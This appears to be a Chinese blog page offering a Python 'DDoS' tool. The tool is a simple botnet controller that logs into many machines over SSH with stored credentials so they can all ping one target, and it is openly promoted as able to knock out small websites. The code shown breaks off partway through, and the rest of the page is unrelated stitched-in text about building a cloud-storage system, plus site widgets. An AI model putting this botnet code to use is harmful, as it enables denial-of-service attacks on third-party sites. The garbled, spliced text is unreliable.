基于python实现的DDoS

代码地址如下:
http://www.demodashi.com/demo/12002.html

本例子包含两个小程序,具体如下:

目录

DDoS

一个简单的网络僵尸程序

下面是一个简单的网络僵尸程序,先通过添加n个客户端的ip和登录账户密码,然后操控这些客户端发动对同一个目标ping的指令。

如果有上网个分布在不同地区的客户端,其ping的威力是不小的,攻击一个小网站是不在话下。

#!/usr/bin/python
# -*- coding: utf-8 -*-
import optparse
#import pxssh
from pexpect import pxssh


class Client:

    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception, e:
            print e
            print '[-] Error Connecting'

    def send_command(self, cmd):
      
  • 9
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
基于Python实现云盘系统主要有以下步骤: 1. 用户管理:使用Python的数据库库,如SQLAlchemy,创建用户表,包含用户ID、用户名、密码等字段。通过用户名和密码验证用户登录,可以使用Flask框架搭建用户注册和登录的接口。 2. 文件管理:使用Python内置的os模块实现对文件的操作,如文件上传、下载、删除等功能。通过Flask框架提供相应的路由,接收用户请求并调用对应的文件操作函数。 3. 存储管理:基于云存储服务,如七牛云、阿里云等,使用Python的云存储SDK实现文件的存储和读取。在用户上传文件时,将文件保存在云存储服务中,并将文件的URL保存到数据库中,以供后续的文件操作。 4. 权限管理:使用Python的Flask框架进行用户鉴权,通过装饰器对不同路由的访问权限进行限制。通过数据库中的用户表,判断用户是否具有操作某个文件的权限。 5. 共享和分享:可以通过生成一个文件的分享链接,让其他用户可以通过该链接来获取文件。可以使用Python的UUID库生成唯一的分享链接,并将链接存储在数据库中。其他用户在访问该链接时,根据链接中的信息获取相应的文件。 6. 安全管理:通过使用Python的hashlib库对用户密码进行加密存储,保证用户信息的安全性。同时,在文件上传和下载过程中,可以使用HTTPS协议进行通信,确保数据传输的安全性。 总结:上述是基于Python实现云盘系统的基本步骤。通过Flask框架提供用户管理、文件管理、分享和权限等功能的接口,结合云存储服务实现文件的存储和读取。通过对用户密码的加密和数据传输的加密保证系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值